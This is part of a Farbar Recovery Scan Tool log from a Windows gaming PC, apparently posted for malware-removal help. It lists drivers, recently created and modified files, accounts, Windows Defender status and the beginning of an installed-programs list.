S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8607648 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) (Whitelisted) =========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-15 22:33 - 000080994 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-16 12:13 - 000026907 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-16 12:12 - 000000000 ____D C:\FRST
2022-07-15 22:31 - 2022-07-15 22:31 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-13 12:49 - 2022-07-13 12:49 - 000000222 _____ C:\Users\Miggy\Desktop\Batman Arkham City GOTY.url
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-07 22:26 - 2022-07-09 19:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
2022-06-27 18:02 - 2022-06-27 18:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Ardent Studios
2022-06-27 18:01 - 2022-06-27 18:01 - 000000223 _____ C:\Users\Miggy\Desktop\Smithworks.url
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ C:\Users\Miggy\AppData\Roaming\asof
2022-06-24 21:24 - 2022-06-24 21:24 - 000000000 ____D C:\Users\Miggy\Documents\Telltale Games
2022-06-24 17:10 - 2022-06-24 17:10 - 000000000 ____D C:\Users\Miggy\Documents\Square Enix
2022-06-23 22:51 - 2022-06-23 22:51 - 000000000 ____D C:\Users\Miggy\AppData\Local\TJoC_R
2022-06-22 22:58 - 2022-07-15 23:03 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-06-22 22:50 - 2022-07-15 23:03 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-06-22 20:31 - 2022-06-22 20:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\Visage
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mediatonic
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\Local\EOSUserHelper
2022-06-21 12:26 - 2022-06-22 20:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\TwistedCarnivalDemo2
2022-06-20 17:27 - 2022-06-20 17:28 - 060760073 _____ C:\Users\Miggy\Downloads\Pokemon - SoulSilver Version (USA, Australia).zip
2022-06-20 17:22 - 2022-06-20 17:28 - 000000000 ____D C:\Users\Miggy\Downloads\desmume-0.9.13-win64
2022-06-20 17:22 - 2022-06-20 17:22 - 006086795 _____ C:\Users\Miggy\Downloads\desmume-0.9.13-win64.zip
2022-06-19 19:14 - 2022-07-10 16:26 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-06-19 18:44 - 2014-09-16 18:45 - 000447752 _____ (On2.com) C:\WINDOWS\SysWOW64\vp6vfw.dll
2022-06-19 18:24 - 2022-06-19 18:32 - 000000000 ____D C:\ProgramData\EA Desktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Electronic Arts
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\EADesktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA
2022-06-19 18:23 - 2022-06-19 18:23 - 001361536 _____ (Electronic Arts) C:\Users\Miggy\Downloads\EAappInstaller.exe
2022-06-19 12:31 - 2022-06-19 12:31 - 000953171 _____ C:\Users\Miggy\Downloads\pluto_t5_full_game.torrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\Program Files (x86)\qBittorrent
2022-06-18 19:50 - 2022-06-18 19:50 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\HotPink and Annue
2022-06-16 19:23 - 2022-06-16 19:23 - 000104448 _____ C:\WINDOWS\system32\nettraceex.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 000232288 _____ C:\WINDOWS\system32\containerdevicemanagement.dll
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-16 12:10 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-16 12:09 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-16 12:08 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-16 12:08 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-16 12:07 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-16 12:07 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-16 12:06 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-16 12:06 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-16 12:06 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-16 12:06 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-16 12:06 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-16 12:06 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-16 12:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-16 12:05 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-16 12:05 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-16 12:05 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-15 23:55 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-15 23:03 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-15 23:03 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-15 23:03 - 2020-08-09 21:02 - 000012424 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-07-15 23:03 - 2020-08-07 18:48 - 000013483 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-07-15 23:03 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-15 23:03 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-15 23:03 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-15 23:03 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-15 23:03 - 2020-02-05 16:07 - 000015984 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2022-07-15 19:54 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-15 19:54 - 2020-08-10 15:18 - 000013155 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2022-07-15 19:54 - 2020-08-10 01:20 - 000011819 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2022-07-15 19:54 - 2020-08-09 20:14 - 000012819 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-07-15 19:01 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-15 18:31 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-14 20:33 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-14 11:39 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-14 11:36 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-14 11:32 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-14 11:32 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-14 11:32 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:07 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-13 23:07 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-13 23:06 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 22:47 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-13 13:03 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-12 23:49 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 01:10 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-11 00:46 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-10 22:27 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-09 19:54 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-08 21:35 - 2021-11-22 21:01 - 000144872 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 002754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000402920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000234984 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000067048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-08 20:35 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-07 19:00 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-05 14:47 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-04 20:17 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
2022-06-26 22:13 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-06-25 14:08 - 2020-01-24 10:41 - 000000000 ____D C:\ProgramData\Packages
2022-06-23 22:51 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\UnrealEngine
2022-06-23 18:25 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-06-22 22:58 - 2020-09-25 11:07 - 000000000 ____D C:\Users\Public\Documents\Adobe
2022-06-22 22:58 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-06-22 22:48 - 2020-08-04 16:37 - 000000000 ____D C:\ProgramData\Adobe
2022-06-22 20:30 - 2022-05-12 17:28 - 000000000 ____D C:\XboxGames
2022-06-22 20:30 - 2020-07-31 18:16 - 000000000 ____D C:\Users\Miggy\AppData\Local\Packages
2022-06-22 17:19 - 2020-08-04 16:35 - 000000000 ____D C:\Users\Miggy\AppData\Local\Adobe
2022-06-22 17:19 - 2019-07-31 00:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-06-21 23:56 - 2021-10-03 18:40 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\PowerLine Studios
2022-06-21 13:02 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-06-21 11:46 - 2020-08-01 22:42 - 000000000 ____D C:\Program Files\Epic Games
2022-06-19 18:24 - 2021-07-12 18:14 - 000000000 ____D C:\Program Files\Electronic Arts
2022-06-19 18:24 - 2020-01-24 10:47 - 000000000 ____D C:\ProgramData\Package Cache
2022-06-19 15:51 - 2022-01-28 21:16 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\qBittorrent
2022-06-19 12:17 - 2021-12-25 13:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\Activision
2022-06-18 21:54 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-06-17 18:18 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\servicing
 
==================== Files in the root of some directories ========
 
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ () C:\Users\Miggy\AppData\Roaming\asof
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
==================== End of FRST.txt ========================
 
And here are the Addition.txt results
=================== Accounts: =============================
 
 
(If an entry is included in the fixlist, it will be removed.)
 
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_1) (Version: 23.4.1.547 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
